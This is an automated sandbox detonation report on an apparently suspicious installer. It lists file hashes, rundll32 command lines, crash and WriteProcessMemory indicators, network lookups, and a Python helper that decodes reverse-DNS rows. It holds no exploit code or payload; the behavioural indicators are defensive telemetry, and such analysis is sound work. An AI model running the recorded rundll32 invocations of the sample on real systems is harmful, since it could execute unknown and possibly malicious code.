SHA256 eb46d9860835b69d33b2583d1e52b20238b666b967bf00906424e3c8a161ed64
SHA512 427271d12590f8ea3f11b83e4c0ce79c55c289573c5f6e5c70c789b28a5181f295a3c9b1a4bdd1f731f338e6edb1e06318ea6410ceac546128a84ff8f2ec0b40

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\fi.pak

MD5 fe011231bbc8b3a74652f6a38f85bc88
SHA1 2b851e46738d466b3a5a470de114d15051b6eb6b
SHA256 7a3249514585491eb47fe4b579edc27ccc48761e7ad6bc11d113b257132c5dd2
SHA512 2a4e5c1409347b4b514556c81ef32c8ae118add28e3469717b13045c8424fed9b817c7988629050ed3e732e0cdca181891b6a8b9e64e4c8d65f004d7c8db9796

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\he.pak

MD5 d8320b09c1e138b00655db0802687bca
SHA1 01616bda6b22c70d5c6440b7451ae736eb1336cb
SHA256 e3336668aad9ad661e7f589f1a405b9c95fc771261cdf9328aca88f4be763374
SHA512 5a91596d7e82dc3d692083ae45aff6fdbddd08ca17f49a020e0769f98c4218b6c9cd31e54524473b7cdccbebf4d7a7f0ff23b5075a1e1ada5cc35c3fd0172bed

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\gu.pak

MD5 225167dbdf1d16b3fafc506eb63f6d1d
SHA1 8651b77f41e3c5b019ccb124a7c8f6449a04b96c
SHA256 ff379dd77136b9b85e7e9fcb5b261ace9c6d9184af3ba2dea35b1757b9bab6d9
SHA512 a353d36a87b6608578816056647de45a456f9012d399b2cb5cb7b9de867a370fcaf1a90d293f367b9b678d13991294425abd85cf77e971afa0d3e9c316952115

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\fr.pak

MD5 d8b4bc789a0c865fb0981611fb5dcdbc
SHA1 33f9f03117f0bba56a696f2fa089ba893ee951a2
SHA256 52aa0a18ace6347b06a89e3851a1b116812c022dbe41da8942278878b5409cee
SHA512 58d19e5a3c68c901fa2a0c327a45b410ab9b9e6c39298db48eed25345453dce1a4633afe6277cf53ed558e160065b89c0e38a32caeced47e79783dbda4d74f26

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\fil.pak

MD5 7354de570c8132723c8e57c4ccb4e7c4
SHA1 177780faf460e3c8a643a4d71c7a4621345a8715
SHA256 91149190c856195fb330605686acf09c7197e5b7efe37fe2a7c76bb8fb08cc89
SHA512 a8487a6a7fd46d62e78ca4262de49e12c120268561ee61a642c45efa48116edebeb40cf9e8be229db0bbf06bb6b5457cc54399a08ee6a603e5540ef5ca482798

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\hi.pak

MD5 9e1788b0f3e330baf2b9356a6c853b20
SHA1 a2f4b37a418669e2b90159c8f835f840026128d9
SHA256 c640313e10e985a58d16f928d2428ae278421a070d948733ac68fdf7312090fd
SHA512 b9a577e084f8daeb53fad0a9423661c99cab272125899a16b0b052606a2cb88f823137f3a21b5c06b10e0235321b7faca84cd759bf406fb2dd02c2f598e92cb5

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\id.pak

MD5 bc719b483f20e9a0b4b88969941c869d
SHA1 4d926a9aba7c350e9da8aa570a9f52534c81aa88
SHA256 f175e58be47b228803aa32d2695e2fcfaf4655b65b96fb6b539b3e59593e6799
SHA512 ddf6108888676c1a90865daaa88198b681b685d9047b0e10f5aa08daa39a628a84732a8518606176529297bec51ce8bc39e910eeffc8b88e9585fafb694c35db

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\hu.pak

MD5 b93beeb1e35a29b310500fa59983f751
SHA1 45c0b2cab4c4a820cfc2aed4b7236ddc79a0db00
SHA256 bab09c3cb80130a4a288642633c2b31ab08b1757466d9a468bc36d276079f002
SHA512 249de5b8bd7c4755caa8b9552254d353b0d885b63bd5f7c6c8e29b3f4e447c9e8d6c0e88d5aaba0b898aa26880592b3904e19ca4797a2ac1dd757aaee782c37c

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\hr.pak

MD5 af7aec4b45ead620463b732e16f63e47
SHA1 e6838c56b945c936fdb87389fdc80cdf7bc73872
SHA256 bfeeafe2f8a9f797d20c4209181c4768fbea4a61ff2dc1f57f6cd18bc872fc13
SHA512 784ff8dc6011883e931b4b8371e5ada960120931bfdf24f81648f5092fa31db1d03e5d3cf5cd16d57ea7fb7877bb25a28533085ab42bfe40dc25ca7d9cee7ade

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\it.pak

MD5 ab160b6e8bbaba8f8bde7e2d996f4f2e
SHA1 eb7eae28a693337b8504e3e6363087b3b113bc72
SHA256 e86ba661b3f6f7ecd2312fe90b873330c0d6516a5501a0f326875844e8d4b289
SHA512 14e8919e2f5a7ad2b3f310ffec590b221e6e0dc45f37efc57ff9b8ff7a3ca674d6f4b9bd65e49a98af6726fa953f2168e5c8e6101ed977e8c7ff4a51203f8d4d

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\kn.pak

MD5 32e5f528c6cee9de5b76957735ae3563
SHA1 74a86191762739d7184b08d27f716cfa30823a98
SHA256 cd297f7e872b34e63ca2d98dc2fa79085e8a2985ba8757601e4b901a3f30b013
SHA512 92d100b1289e63fd0dc65657fb4b1e16f298735e6cd066e9122d04e3b79e0d286f15fc9f1da2c3a05af528b92bde95fcfbc493c466db2d94a0749adfbf7fb8d5

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ja.pak

MD5 dee9626a8d7cacc7e29cff65a6f4d9c3
SHA1 5c960312f873ab7002ed1cce4afdb5e36621a3ce
SHA256 63ad3974baa8c160ba30448171f148d008ac19e80010fb13d3a65cf411b67ae0
SHA512 ee80d58886f4ac378d6491e075062c171a715af7c42dd1785952b25a572381acd722764e8be914adbfccf2a5fa4a51968b989b632eefb9d636851f1b8ffb82e1

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\nb.pak

MD5 28cc86c7204b14d080f661a388e7f2c0
SHA1 e0927ea3c4fd6875dafd7946affb74ad2db400f5
SHA256 9253122d94ccea904fb9363b8178ca9335b8380b7891f1a7a22afb3113309e72
SHA512 e2524e10d145f95c028d65e47cf06fc82c7a43fcf0ecf01202278c7fb14079c03e9434e8039fd96aaee870872c9896d9f0ed575e50c19a3781cb0c94fe59b3a5

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ms.pak

MD5 73096184d7bd6a9a2a27202d30a3cfa1
SHA1 ea711b29787aa8b9e9af6bde5b74103429e5855f
SHA256 d1072514bab63af5dfbf923175d491787139f0c1b6361acb23e67543836c84ba
SHA512 e3fbee4896554e502c222b5ffe38e9d61e9db4d18cdc92ce5118b819dc60789bfd6d6c7f8444ff1763222455ab91e79bfe500e75c0e06b0de70c2c64fb043c6f

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\mr.pak

MD5 fda40999c6a1b435a1490f5edca57ccd
SHA1 41103b2182281df2e7c04a3fff23ec6a416d6aa9
SHA256 0ebb125a0bdfd1e21b79914ca8e279790d41f7bac35bf2d031dd7981f1c1c056
SHA512 666ceb24d2e568a00a77512295e224a6545bf6abcfa19c93aa823db5330117fcb39fde570e7601dbd41976950c3ec03634f89fc5d9203357515e6651ab0b6d32

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ml.pak

MD5 6e96eddfe80da6aaa87f677feef4d1d6
SHA1 8a998785d56bc32b15cee97b172cd2dcdc8508d9
SHA256 e2fb73353ab05eb78f9845bdbdf50b64c9fb776b7f08948f976fe64e683397c4
SHA512 feea11dfc6ec153ab903b5828306617eedeee19daa73bd046ae47757795fecb9abce6192bb3a9561aaace7fc85ee442057b93081c6c986855b819fd38815e6f7

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\lv.pak

MD5 e75cdda386dd3131e4cffb13883cda5f
SHA1 20e084cb324e03fd0540fff493b7ecc5624087e9
SHA256 ae782f1e53201079ca555baa5ec04b163188e5161242d185f04a606a49fc8c0d
SHA512 d27bc61028031946ed6708918f921c3d681c8962b8d5507a91ab6576e3b2c462524e550305db87ede886e41fb0e49edec2d84cdbbad675282105627e01d98bf5

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\lt.pak

MD5 3e9119a712530a825bca226ec54dba45
SHA1 10f1b6bf2fa3a1b5af894d51b4eb47296c0dbc36
SHA256 3da531a9a5870315823e74b23031cb81379d2d94ae9894a7fb1d8a8ad51a2da9
SHA512 765c872cafa1b266575b0cac09dfa796cdb860bd82e1c657397fe2aada11771f306b0a1776e4d66ff41e94b153c812592430f31e7b1ff97abe7d8e6b96d321f1

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ko.pak

MD5 38a95d783d627e9a83ad636faa33c518
SHA1 cb57e8e9ef30eb2b0e47453d5ec4f29cea872710
SHA256 0d9b23e2981412d11ecea3ade8d521a073802d9431c39d72b88f62b98e50a96b
SHA512 4119b8f82107473c941c9e10b6bae97d60c9c47570cc2b40f429a95f4f5cca77eecbacd7023af439429026f6e55ad9df19998c8b98be0d04d384b310d025c0dc

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\pl.pak

MD5 ba7a9aba68211d8639dffae0ef8b88da
SHA1 a9a26b8f0902475cb576967cbe9013028cb21da4
SHA256 60aa08598a81bb46ddc64a5ab0852565554c6e6262e9c5dfee09f4e3fc08d5fe
SHA512 a1b8bfc3e19aa1267e31838e1c1f2b0b1cfcdf56f84e967088d626b58ec64b3305043a14b12fd080498ee1d74a4192453914c393ce8f848ea5616cf88abc4eb5

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\nl.pak

MD5 7fc6ae561fd7c39ff8ba67f3dbaa6481
SHA1 2e3977403a204c6f0ca9a6856bb1734490a57e72
SHA256 844031e1de2b2872d12d5b7d42adf633c9d4b48169b1b33b7492b3b060c73558
SHA512 90294ae24b7db003bc34a48f98d9e1887e87c6f605defe01ddcf9187429e8446c04a7f94bb6aadc8e61c98842163bc3702b414393ab836eb0bee038f09481c2b

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ro.pak

MD5 4e692489e2ae74a4a11ca0a113048f15
SHA1 cb2b80217d5372242d656ac015c024fe1e5e77b7
SHA256 4a2a305668f1926cfe4bb72e8fbfde747c83ac4dd9cf535c13ae642d0b96fb79
SHA512 8ad9e0a79137a862def24d6963536e75b87bb71ab74dbdd43531c5c95ddd3cd834f22c6a8e3a1e03aad35ade65ecd227d5101b5be3ce3f0b7b471f5136cfd77c

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\pt-PT.pak

MD5 0237374730fa1a92dec60c206d7df283
SHA1 62dbbd855d83ef982a15c647b5608dafb748745a
SHA256 2fb2fd2e32b952dcbc8914f9d3aaf02bf2750b72abfee2e8b2bb08062ddd9934
SHA512 63ec4ec44002724e22703a3bd952d1ff4062b367c4f5e3f106349bd226ad1317bef2e371fda0e099ea5c0afd32a9d2c1246c93c18d73dccf8fc2c1644a6fb6b2

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\pt-BR.pak

MD5 53d5fb849c9bab70878b3e01bffad65a
SHA1 e72af1a76539e66cef4a4eef5844b067a4e1a79f
SHA256 40dd24c5e225ed941bbaab3dcfefa993e39fbc75a1798f4f6e06424956698ac5
SHA512 55357643d789d2eed72e009f08f72ba4895ba455ca00c8347a3c3790e43f8d7e4625feda438ecac840bdc52c26d2135d89bea693b61a293922b6056bde6b4516

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sr.pak

MD5 8f58b2463e8240ef62e651685e1f17d8
SHA1 6c9f302aed807a67f6b93bcb79577397a5ad3cf7
SHA256 5a55320d6953efb5b565893e32e01f6dae781a16460df5502c8ba012c893edfd
SHA512 6076d43a73d5fa5192cbe597e018b268cfdc7efb94a6cb45dad5b0da9c3abf68aaf2ea06f3ad650b28a993605917b6d356339d79f8dd6962d2c40dbf4653ef83

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sl.pak

MD5 435a2a5214f9b56dfadd5a6267041bd3
SHA1 36bbc7ca3d998bfb1edc2ff8a3635553f96ca570
SHA256 341c33514c627501026c3e5b9620cf0d9f482ab66b10a7e0fb112c7620b15600
SHA512 55271935e18ac27c753431af86a7dcd1f4a768adef1b593ba8e218da34856a5f9faf9819a3ecce3f21f0607ba95100c5cb18cd1a7138ec563090d0391ad5b52d

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sk.pak

MD5 f117e58e6eb53da1dbfa4c04a798e96f
SHA1 e98cee0a94a9494c0cfc639bb9e42a4602c23236
SHA256 b46db20eeba11f8365296b54469fdd001579852dc1d49a01fc59d2a8bcf880a3
SHA512 dea792a63e0557d9e868c0310ec2a68b713daf5cf926389e05a0885cdb05433d20f35d087de269f9584795da50600966b8ff5dd95583861443a1e90564a89793

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ru.pak

MD5 1a9b38ec75ccfa3214bef411a1ae0502
SHA1 de81af03fff427dfc5ffe548f27ed02acae3402d
SHA256 533f9e4af2dce2a6e049ac0eb6e2dbf0afe4b6f635236520aee2e4fa3176e995
SHA512 05cf20aea71cdd077b0fa5f835812809ad22c3dbebc69e38ab2c9a26ad694ab50d6985aec61633b99713e7f57408c1c64ce2fb9ccdac26661b7167853bdd6148

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sv.pak

MD5 e4c9ced1a36ea7b71634e4df9618804f
SHA1 c966c8eb9763a9147854989ea443c6be0634db27
SHA256 e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379
SHA512 d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\th.pak

MD5 4917873d8118906bdc08f31afb1ea078
SHA1 49440a3b156d7703533367f8f13f66ec166db6e9
SHA256 d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d
SHA512 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\te.pak

MD5 17b858cf23a206b5822f8b839d7c1ea3
SHA1 115220668f153b36254951e9aa4ef0aa2be1ffc4
SHA256 d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457
SHA512 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ta.pak

MD5 5f80c9da0c09491c70123581a41f6dad
SHA1 3fc9560a954271cf09aaa54eec34963c72c06e85
SHA256 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884
SHA512 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\sw.pak

MD5 59ff4e16b640ef41100243857efdd009
SHA1 f712b2d39618ffadcf68d1f2ab5a76da5be14d74
SHA256 c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804
SHA512 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\locales\ur.pak

MD5 861ffd74ae5b392d578b3f3004c94ce3
SHA1 8a4a05317a0f11d9d216b3e53e58475c301d7ea5
SHA256 b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc
SHA512 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\zh-CN.pak

MD5 3210460a24f2e2a2edd15d6f43abbe5f
SHA1 608ff156286708ed94b7ae90c73568d6042e2dbd
SHA256 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605
SHA512 f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\vi.pak

MD5 4076d3c0c0e5f31cf883198c980d1727
SHA1 db51b746216ea68803c98d7c1a5a2b45944359f3
SHA256 f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379
SHA512 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\uk.pak

MD5 381cb33c2d4fd0225c5c14447e6a84e0
SHA1 686b888228f6dd95ade94fee62eb1d75f3e0fc93
SHA256 c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820
SHA512 f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\tr.pak

MD5 55e06cd9356d0fb6f99932c2913afc92
SHA1 aa5c532ddb3f80d2f180ad62ce38351e519a5e45
SHA256 afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9
SHA512 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\zh-TW.pak

MD5 f466116c7ce4962fe674383d543c87f6
SHA1 f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e
SHA256 ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b
SHA512 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\7e280c11-94d3-4ccf-be9f-f1208aa9ffd9.tmp.node

MD5 ba973fe2fa62e2bfa81c30cb0d77b2c2
SHA1 69fed56755ea90b354ae637e88b04f9568c2a8cb
SHA256 9e39235c5b07ca875e8e139ca6b29fc97205875df5c009c3854f64a5cdeef778
SHA512 867067ae3b58d10a914aefb8b9a3f9550b20f724ad6f5011d391f83f153fb9f3418ef27bc78008146b9b04657e72ebd827799fa3aff247a61b5986e83593c0cf

C:\Users\Admin\AppData\Local\Temp\9b2d9968-ab92-427d-a1cf-ccecdc2ab69b.tmp.node

MD5 56192831a7f808874207ba593f464415
SHA1 e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512 c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

C:\Users\Admin\AppData\Local\Temp\86c0865f-2ec7-47c2-95d2-2dc23ae37f1b.tmp.node

MD5 efe1f662b2b23a094b20f0a951c14b10
SHA1 9f239fbdb6ec000710bf33923d29eddf65b357c7
SHA256 04e3334cd62fc251145ac09a052b6a069634740c4b61825cce0f14a588542ec6
SHA512 50c13ee918422fdc2e6e53e67f51a4b8eb22c84dda54f5afdcadd96e9ecf000097c6beb0778511a2e5ee93130694c4a66bc8a73db614c8b6faa1a70243e9ab07

memory/2956-574-0x000001F114F10000-0x000001F114F32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfm3g3tp.21x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/1884-655-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-654-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-653-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-660-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-665-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-664-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-663-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-662-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-661-0x000001B629000000-0x000001B629001000-memory.dmp

memory/1884-659-0x000001B629000000-0x000001B629001000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

53s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

Signatures

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4356 wrote to memory of 1676 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe
PID 4356 wrote to memory of 1676 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe
PID 4356 wrote to memory of 1676 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1676 -ip 1676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 628

Network

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240426-en

Max time kernel

146s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 20.231.121.79:80 | N/A | tcp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 89.43.201.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp

Files

N/A
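The Network table of behavioral9 is mostly PTR queries to 8.8.8.8 plus one direct TCP connection, and the in-addr.arpa names only become readable once their octets are reversed. The following Python is an added example, not part of the sandbox report or its tooling: it takes the behavioral9 rows (copied above as constructed input, in the report's own column order, with the direct TCP row carrying no Domain), decodes each reverse-lookup name back to the address being queried, and lists any direct connection whose peer never appeared in a PTR query.

```python
import re

# Constructed sample: the Network rows of the behavioral9 detonation, one per
# line, exactly as the report prints them. The tcp row has no Domain column.
NETWORK_ROWS = """\
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 89.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
"""

PTR_NAME = re.compile(
    r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa\.?$", re.IGNORECASE
)


def ptr_to_ip(name):
    """Undo the octet reversal of an in-addr.arpa name; None if it is not one."""
    m = PTR_NAME.match(name)
    if not m:
        return None
    octets = m.groups()[::-1]          # PTR names list the octets back to front
    if any(int(o) > 255 for o in octets):
        return None
    return ".".join(octets)


def parse_row(line):
    """Split one report row into (country, host, port, domain, proto).

    Rows for connections without a DNS name have only three fields, so the
    Domain column is returned as an empty string for them."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = ""
    else:
        raise ValueError(f"unexpected row: {line!r}")
    host, _, port = dest.rpartition(":")
    return country, host, int(port), domain, proto


def summarize(rows_text):
    """Group rows into decoded PTR targets, forward lookups and direct connections."""
    reverse_lookups, forward_lookups, direct = [], [], []
    for line in rows_text.splitlines():
        if not line.strip():
            continue
        _country, host, port, domain, proto = parse_row(line)
        if not domain:
            direct.append((host, port, proto))
            continue
        ip = ptr_to_ip(domain)
        if ip:
            reverse_lookups.append(ip)
        else:
            forward_lookups.append(domain)
    # Direct connections to a peer that was never the subject of a PTR query.
    seen = set(reverse_lookups)
    unexplained = [d for d in direct if d[0] not in seen]
    return {
        "reverse_lookups": reverse_lookups,
        "forward_lookups": forward_lookups,
        "direct": direct,
        "direct_without_ptr": unexplained,
    }


if __name__ == "__main__":
    result = summarize(NETWORK_ROWS)
    for ip in result["reverse_lookups"]:
        print("PTR query for", ip)
    for host, port, proto in result["direct_without_ptr"]:
        print(f"direct {proto} connection to {host}:{port} with no matching PTR query")
```

For behavioral9 the nine PTR names decode to nine distinct addresses, none of which is 20.231.121.79, so the single TCP connection is reported as having no matching reverse lookup. The report attributes all rows to the detonation as a whole, so this only separates what was asked of the resolver from what was connected to; it does not by itself tell which process issued each request.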

Analysis: behavioral12

Detonation Overview

Submitted

